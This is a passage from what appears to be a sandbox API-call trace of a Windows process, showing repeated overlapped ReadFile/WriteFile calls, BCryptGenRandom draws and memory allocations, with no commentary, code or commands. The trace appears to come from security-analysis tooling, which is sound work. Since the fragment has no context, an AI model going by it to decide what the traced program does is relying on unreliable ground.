lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.496] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.497] CloseHandle (hObject=0x3cc) returned 1 [0205.497] free (_Block=0x3df0008) [0205.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.504] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0205.504] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0205.504] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.504] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.505] free (_Block=0x3e305b8) [0205.505] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.505] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.505] free (_Block=0x1fa91d0) [0205.505] free (_Block=0x1fa2ed8) [0205.505] free (_Block=0x1fa90b8) [0205.505] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.506] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.506] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.514] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.514] CloseHandle (hObject=0x3cc) returned 1 [0205.514] free (_Block=0x3df0008) [0205.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.663] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0205.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0205.664] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.664] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.664] free (_Block=0x3e305b8) [0205.664] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.664] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.664] free (_Block=0x1fa91d0) [0205.664] free (_Block=0x1fa2ed8) [0205.664] free (_Block=0x1fa90b8) [0205.664] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.665] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.665] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.665] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.759] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x97e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.759] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.764] CloseHandle (hObject=0x2a8) returned 1 [0205.765] free (_Block=0x1ff1e60) [0205.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.854] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0205.855] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0205.855] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.855] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.855] free (_Block=0x3e305b8) [0205.856] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.856] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.856] free (_Block=0x1fa91d0) [0205.856] free (_Block=0x1fa2ed8) [0205.856] free (_Block=0x1fa90b8) [0205.856] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.856] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.857] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.867] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x160, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.868] CloseHandle (hObject=0x3cc) returned 1 [0205.868] free (_Block=0x3df0008) [0205.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0205.888] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0205.889] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.889] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.889] free (_Block=0x3e305b8) [0205.889] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.889] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.889] free (_Block=0x1fa91d0) [0205.889] free (_Block=0x1fa2ed8) [0205.889] free (_Block=0x1fa90b8) [0205.889] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.890] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.890] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.890] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.916] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5ab, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.916] CloseHandle (hObject=0x3cc) returned 1 [0205.916] free (_Block=0x3df0008) [0205.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0205.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0205.925] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.925] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.925] free (_Block=0x3e305b8) [0205.925] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.925] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.925] free (_Block=0x1fa91d0) [0205.925] free (_Block=0x1fa2ed8) [0205.925] free (_Block=0x1fa90b8) [0205.925] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.926] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.936] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.936] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.937] CloseHandle (hObject=0x3cc) returned 1 [0205.937] free (_Block=0x3df0008) [0205.937] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.944] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0205.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0205.945] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.946] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.946] free (_Block=0x3e305b8) [0205.946] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.946] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.946] free (_Block=0x1fa91d0) [0205.946] free (_Block=0x1fa2ed8) [0205.946] free (_Block=0x1fa90b8) [0205.946] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.946] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.947] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.969] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2fe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.969] CloseHandle (hObject=0x3cc) returned 1 [0205.969] free (_Block=0x3df0008) [0205.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0206.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0206.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0206.013] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0206.013] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0206.013] free (_Block=0x3e305b8) [0206.013] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0206.013] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0206.013] free (_Block=0x1fa91d0) [0206.013] free (_Block=0x1fa2ed8) [0206.013] free (_Block=0x1fa90b8) [0206.014] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0206.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0206.022] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1a7, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0206.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0206.034] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0206.034] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.035] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0206.035] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0206.035] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0206.036] free (_Block=0x3e305b8) [0206.036] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0206.036] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0206.037] free (_Block=0x1fa91d0) [0206.037] free (_Block=0x77d7a8) [0206.037] free (_Block=0x1fa90b8) [0206.037] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0206.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0206.043] CloseHandle (hObject=0x170) returned 1 [0206.045] free (_Block=0x3e70008) [0206.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0206.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.076] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0206.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0206.077] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0206.077] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0206.077] free (_Block=0x3e305b8) [0206.077] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0206.077] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0206.077] free (_Block=0x1fa91d0) [0206.077] free (_Block=0x1fa2ed8) [0206.077] free (_Block=0x1fa90b8) [0206.077] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0206.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0206.080] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x144, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0206.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0206.081] CloseHandle (hObject=0x170) returned 1 [0206.081] free (_Block=0x3df0008) [0206.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, 